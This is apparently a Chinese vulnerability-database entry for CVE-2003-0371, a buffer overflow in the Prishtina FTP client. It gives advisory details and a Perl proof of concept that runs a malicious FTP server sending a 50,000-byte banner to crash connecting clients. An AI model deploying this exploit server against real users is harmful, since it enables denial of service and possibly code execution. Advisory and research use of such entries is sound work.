Prishtina FTP客户端缓冲区溢出漏洞

Prishtina FTP客户端缓冲区溢出漏洞

漏洞ID 1107346 漏洞类型 缓冲区溢出
发布时间 2003-05-23 更新时间 2003-06-16
图片[1]-Prishtina FTP客户端缓冲区溢出漏洞-安全小百科CVE编号 CVE-2003-0371
图片[2]-Prishtina FTP客户端缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-200306-063
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/22637
https://www.securityfocus.com/bid/87126
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200306-063
|漏洞详情
PrishtinaFTP客户端1.x版本存在缓冲区溢出漏洞。远程FTP服务器借助超长FTPbanner导致服务拒绝(崩溃)并可能执行任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/7671/info

Prishtina FTP client is allegedly prone to a denial of service vulnerability. The condition is reportedly triggered when processing FTP server banners of excessive length. As a result, a malicious attacker-controlled server may be used to crash a target users FTP client. 

#!/usr/bin/perl
use IO::Socket;
$host = "localhost";
$port = "21";
$server = IO::Socket::INET->new(LocalPort => $port, Type =>
SOCK_STREAM,
Reuse => 1, Listen => 2) or die "Couldn't create tcp-server.n";
$data = "A";
$num = "50000";
$buf .= $data x $num;
while ($client = $server->accept()) {
 print "OK";
 print $client "$bufn";
 close($client);
}
|受影响的产品
Prishtina Soft Prishtina FTP V.1
|参考资料

来源:BUGTRAQ
名称:20030522PrishtinaFTPv.1.*:remoteDoS
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=105370592729044&w;=2

相关推荐: Sudo Password Prompt Heap Overflow Vulnerability

Sudo Password Prompt Heap Overflow Vulnerability 漏洞ID 1102224 漏洞类型 Boundary Condition Error 发布时间 2002-04-25 更新时间 2002-04-25 CVE编号 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享